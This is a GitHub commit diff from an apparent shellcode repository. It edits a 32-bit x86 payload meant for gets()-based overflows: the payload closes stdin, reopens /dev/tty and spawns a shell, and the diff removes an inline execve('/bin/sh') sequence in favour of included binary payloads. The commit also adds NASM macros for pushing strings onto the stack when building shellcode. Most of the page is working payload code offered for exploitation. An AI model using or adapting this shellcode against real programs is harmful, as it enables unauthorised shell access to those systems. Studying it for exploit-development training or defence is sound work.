Skip to content

Commit 06eda48

Browse files
evanpjensenevanpjensen
committed
added a macro that makes pushing strings on the stack easy
1 parent 1d90d41 commit 06eda48

File tree

2 files changed

+74
-15
lines changed

2 files changed

+74
-15
lines changed

getsShellcode/getsShellcode.s

Lines changed: 13 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -3,32 +3,30 @@
33
BITS 32
44
55
%include "short32.s"
6+
%include "syscall.s"
67
global main
78

89
main:
910
_close:
1011
xor eax,eax
1112
xor ebx,ebx
12-
mov al,close
13-
int 0x80 ;close stdin
13+
SYSTEM_CALL(close) ;close(STDIN_FILENO)
1414
tty:
1515
push ebx
1616
push 0x7974742f
1717
push 0x7665642f
1818
mov ebx,esp ;/dev/tty
1919
xor ecx,ecx
2020
mov cl,2 ;O_RDRW
21-
mov al,open
22-
int 0x80 ;open("/dev/tty",O_RDRW);
23-
21+
SYSTEM_CALL(open) ;open("/dev/tty",O_RDRW);
22+
2423
;; Any local shellcode here
25-
sh:
26-
xor eax,eax
27-
push eax
28-
push 0x68732f2f
29-
push 0x6e69622f
30-
mov ebx,esp
31-
xor edx,edx
32-
xor ecx,ecx
33-
mov al,execve
34-
int 0x80
24+
25+
%define EMULATOR
26+
%ifdef EMULATOR
27+
;; shell emulating shellcode
28+
incbin "../32shellEmulator/shellcode"
29+
%else
30+
;; ordinary shellcode (/bin/sh)
31+
incbin "../32bitLocalBinSh/shellcode"
32+
%endif

include/util.s

Lines changed: 61 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -15,5 +15,66 @@
1515
(((x) & 0xff000000) >> 24))
1616

1717
%define htons(x) ((((x) & 0xff00) >> 8) | (((x) & 0x00ff) << 8))
18+
1819
%define ip(a,b,c,d) htonl(a << 24 | b << 16 | c << 8 | d) ; ip(127,0,0,1)
20+
21+
%define htonx(x) \
22+
%if __BITS__==16 \
23+
htons(x) \
24+
%elif __BITS__==32 \
25+
htonl(x) \
26+
%elif __BITS__==64 \
27+
htonq(x) \
28+
%elif \
29+
%error "__BITS__ is not 16, 32 or 64" \
30+
%endif
31+
32+
%macro str_null_check 1
33+
%assign word_length __BITS__/8
34+
%strlen len_arg %1
35+
%if len_arg % word_length!=0
36+
%fatal "Make string a multiple of the word length"
37+
%endif
38+
%endmacro
39+
40+
%macro str_null_check 2
41+
%assign word_length %2/8
42+
%strlen len_arg %1
43+
%if len_arg % word_length!=0
44+
%fatal "Make string a multiple of the word length"
45+
%endif
46+
%endmacro
47+
48+
;; The PUSH_STRING macros don't null terminate the string
49+
;; arguments must be known at assemble time
50+
51+
52+
%macro PUSH_STRING 2 ;string, bitcount
53+
str_null_check %1 %2
54+
%assign word_length %2/8
55+
%strlen string_length %1
56+
%assign num_pushes string_length/word_length
57+
%assign index string_length
58+
%rep num_pushes
59+
%substr slice %1 index-word_length+1,word_length
60+
%assign index index-word_length
61+
push slice
62+
%warning push slice
63+
%endrep
64+
%endmacro
65+
66+
%macro PUSH_STRING 1 ;string
67+
str_null_check %1
68+
%assign word_length __BITS__/8
69+
%strlen string_length %1
70+
%assign num_pushes string_length/word_length
71+
%assign index string_length
72+
%rep num_pushes
73+
%substr slice %1 index-word_length+1,word_length
74+
%assign index index-word_length
75+
push slice
76+
%warning push slice
77+
%endrep
78+
%endmacro
79+
1980

0 commit comments

Comments
 (0)